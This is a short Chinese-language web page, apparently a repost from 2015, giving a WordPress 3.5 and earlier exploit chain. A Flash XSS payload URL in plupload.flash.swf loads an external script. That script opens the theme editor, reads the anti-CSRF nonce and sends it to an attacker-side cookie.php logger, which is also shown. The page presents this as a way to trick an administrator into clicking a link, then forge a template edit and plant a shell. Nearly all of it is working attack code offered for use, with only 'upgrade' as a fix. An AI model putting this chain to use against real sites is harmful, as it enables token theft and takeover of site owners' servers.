鸿 网 互 联 www.68idc.cn

当前位置 : 主页 > 网站安全 > 安全设置 > >

wordpress anti-csrf token bypass

来源:互联网 作者:佚名 时间:2015-10-19 08:46
wordpress 后台修改模版 anti-csrf token可以bypass。真的可以结合社工拿shell了。童叟无欺。影响版本 3.5及一下版本,3.5.1则不存在这个漏洞。 wordpress 3.5及一下版本有个FLASH XSS.详情见 Flash应用安全系列[3]--WordPress反射型跨站(0day) 想骗取管理员
wordpress 后台修改模版 anti-csrf token可以bypass。真的可以结合社工拿shell了。童叟无欺。影响版本 3.5及一下版本,3.5.1则不存在这个漏洞。
wordpress 3.5及一下版本有个FLASH XSS.详情见 Flash应用安全系列[3]--WordPress反射型跨站(0day) 
 
想骗取管理员点击你的链接 CSRF 添加个SHELL,可以是有个anti-csrf token.
 
但可以用这个XSS盗取anti-csrf token.进而顺利CSRF,拿shell。
 
假设我们要盗取的是修改404模版的token.
 
结合社工在评论下面添加下面的链接
 
http://localhost/wp/wp-includes/js/plupload/plupload.flash.swf?id=0\%22%29%29}catch%28e%29{if%28!window.x%29{window.x=1;document.write('<script src=http://localhost/1.js></script>');}}//
 
1.js 内容为
 
 
x=window.open('http://localhost/wp/wp-admin/theme-editor.php?file=404.php&theme=twentytwelve');
setTimeout("fuck(x)",5000);
function fuck(x) {
var a=x.document.getElementById('_wpnonce').value;
alert(a);
location.href='http://localhost/cookie.php?c='+a;
}
 
 
 
本地cookie.php内容为
 
 
<?php
fputs(fopen("cookie.txt","w"),$_GET[c]);
?>
 
 
 
管理员点击后。。。即可在COOKIE.TXT中看到你想要的,你值得拥有
 
 
 
说下 这个TOKEN是一直不会变的 除非重新安装WP。
 
O了 你们懂的 

 
修复方案:

升级啊 亲 
 
网友评论